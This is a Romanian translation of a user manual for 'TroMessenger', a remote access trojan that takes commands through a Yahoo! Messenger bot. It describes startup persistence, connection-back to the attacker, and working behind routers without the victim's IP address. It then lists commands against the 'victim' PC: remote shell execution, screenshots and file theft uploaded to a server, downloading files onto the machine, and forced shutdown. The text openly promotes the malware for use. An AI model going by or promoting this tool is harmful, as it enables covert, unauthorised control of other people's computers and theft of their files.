TroMessenger
(Un trojan pentru
controlarea pc-urilor bazat pe Yahoo! Messenger)
Programat de:
Sma
Soft
www.sma-soft.ir
sma_soft@yahoo.com
Translation by: ibtiberiu
Ce este acest program?
Acesta este un trojan pentru controlarea calculatoarelor de la
distanta prin Yahoo! Messenger.
Prin intermediul acestui program poti controla orice calculator trimitandu-i
mesaj unui robot special Yahoo! Messenger instalat in setarile Yahoo! ale ale
calculatorului.
E ca si cum i-ai comanda calculatorului ce sa faca.
Cum functioneaza?
Iata cum lucreaza programul:
0) Merge in Startup.
1) Se salveaza in memorie.
2) Asteapta conexiunea la internet.
3) Cand conexiunea la internet este activata, incearca sa se conecteze la id-ul
Robotului.
4) Trimite un mesaj offline adminului, cand se conecteaza cu succes.
5) Acum poti controla calculatorul victimei tramitand mesaj robotului tau.
Functii Speciale
Nu ai nevoie de adresa IP! Este cea mai
mare calitate a acestui program. Cu alti trojani trebuia
sa ai adresa IP a calculatorului pe care vroiai sa il controlezi. Dar acest
program functioneaza fara adresa IP.
Intrebare - Cum poate
sa functioneze acest trojan fara adresa IP?
Raspuns - Pentru ca acest program produce un ID de
yahoo! care se comporta ca un robot pentru tine, asa ca nu ai nevoie de adresa
IP a calculatorului controlat. Cu toate astea adresa de IP iti va fi trimisa
cand calculatorul se conecteaza. Dar acestea sunt doar pentru a cunoaste mai
multe despre controlul unui calculator de la distanta si nu are nici un efect
asupra activitatii lui TroMessenger.
Functioneaza si in "spatele" Retelelor Si a
calculatoarelor conectate prin router. O mare problema a altor
trojeni, cum ar fi Troya, este ca functioneaza doar pe sisteme cu IP
personalizat. Calculatorul tinta trebuie sa aiba Addresa de IP Valida
cunoscuta de tine. De exemplu: daca este o retea cu 5 calculatoare si tu faci
parte din acea retea te poti conecta la acele
calculatoare dar cineva din afara retelei nu se poate
conecta la acea retea deoarece nu are o adresa IP valida a calculatorului
din retea. Dar problema este rezolvata in
TroMessenger.
Cu TroMessenger, te poti conecta la orice
calculator in in orice retea. Doar ca
trebuie sa fie conectati la internet iar Serverul TroMessenger sa functioneze pe
acel calculator.
Comenzi
In aceasta versiune, sunt niste comezi de baza pentru controlarea calculatoarelor.
Rezultat: Rezultatul executarii unei comenzi va fi trimis imediat dupa terminarea executarii acelei comenzi. Dar daca raspunsului este prea mare (mai mult de 800 caractere) il vei primi in mai multe parti. Asta pentru ca Yahoo! Messenger nu accepta text cu marime mai mare de 800 caractere.
/cmd - Este exact ca MS-DOS Command
Prompt. Poti executa o comanda DOS pe calculatorul controlat, si sa vezi
rezultatul. comenzi cum ar fi: DIR , VER , VOL , IPConfig , Netstat , WHOAMI
... si alte comenzi de DOS folositoare.
Exemplu: /cmd dir C:\*.txt
/Help - Afiseaza o lista cu comenzi posibile in aceasta versiune de TroMessenger. Poate ca vor fi adaugate comenzi noi pe urmatoarea versiune. Vei afla comenzile posibile scriind comanda aceasta.
/screenshot -
Afiseaza Poze ale ecranului victimei.
Intrebare - Yahoo! Messenger este program bazat pe
scriere, dar cum poate TroMessenger sa imi arate poza ?
Raspuns - TroMessenger iti arata poza indirect.
Asta inseamna: face printsceen, face upload la server, si iti da linkul cu poza
facuta.
/download -
Downloadeaza un fisier de pe net si il salveaza in calculatorul victimei
intr-o anumita locatie. Vei fi anuntat odata cu terminarea downloadului.
Sintaxa: /download
"http://www.hostname.com/folder/file.zip" "C:\SavedFile.zip"
Nota: Trebuie sa folosesti ghilimele (").
Daca ai uitat sa pui ghilimele downloadul nu va functiona.
/restart -
Restarteaza windowsul calculatorului victima.
Avertizare: Daca vei testa programul pe
calculatorul tau, calculatorul se va restarta fara nici o intrebare sau
confirmare si toate modificarile facute in program vor fi pierdute, asa ca ai
grija cum folosesti comanda. Deasemenea comanda de Shutdown.
/shutdown - Inchide calculatorul controlat. (Se repeta avertizarea)
/time , /date - Arata ora si data.
/ejectcd - Deschide CD-ROM-ul.
/closecd - Inchide CD-ROM-ul.
/view - Arata continutul unor fisiere care contin text. Nota: daca textul este mai mare de ... bytes va fi imapartit in mai multe bucati si vor fi trimise una cate una.
/getfile - uploadeaza un fisier la server si iti da link-ul. Este folosit pentru a downloada orice fisier care nu contine text de pe calculatorul controlat.
/status , /idle ,
/busy - Schimba statusul robotului in ce vrei tu. Plus folosirea
semnului "ocupat".
Exemple de Status-uri:
/status Now I'm ready.
/idle I'm away from PC.
/busy Currently Busy.
/cancel - Opreste orice comanda executata. De exemplu daca ai ales sa vezi un fisier de 1M si textul iti este trimis bucata cu bucata tu poti oricand sa opresti operatia si sa nu-ti mai trimita din textul ramas. Foloseste doar comanda /cancel.
/login - Pentru conectarea persoanelor fara admin. De fiecare data cand TroMessenger porneste, daca nu esti adminul robotului dar stii parola ar trebui sa folosesti /login your password ca sa incepi sa folosesti programul. Nu folosi ghilimele pentru parola ta.